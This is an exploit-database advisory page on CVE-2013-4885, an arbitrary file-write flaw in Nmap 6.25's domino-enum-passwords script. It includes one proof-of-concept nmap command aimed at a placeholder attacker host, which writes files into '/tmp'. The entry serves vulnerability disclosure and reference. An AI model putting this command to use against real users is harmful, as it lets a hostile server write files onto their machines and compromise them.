[] NeoSense
E X P L O I T S
title author type platform port cve id

Nmap - Arbitrary File Write

Author: Piotr Duszynski
type: remote
platform: linux
port: 
date_added: 2013-08-06 
date_updated: 2015-11-17 
verified: 1 
codes: CVE-2013-4885;OSVDB-96051 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/62024/info

Nmap is prone to an arbitrary file-write vulnerability.

An attacker can exploit this issue to write arbitrary files with the permissions of the user running the nmap client. This will allow the attacker to fully compromise the affected machine.

Nmap 6.25 is vulnerable; other versions may also be affected.

nmap --script domino-enum-passwords -p 80 <evil_host> --script-args domino-enum-passwords.username='patrik karlsson',domino-enum-passwords.password=secret,domino-enum-passwords.idpath='/tmp'
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.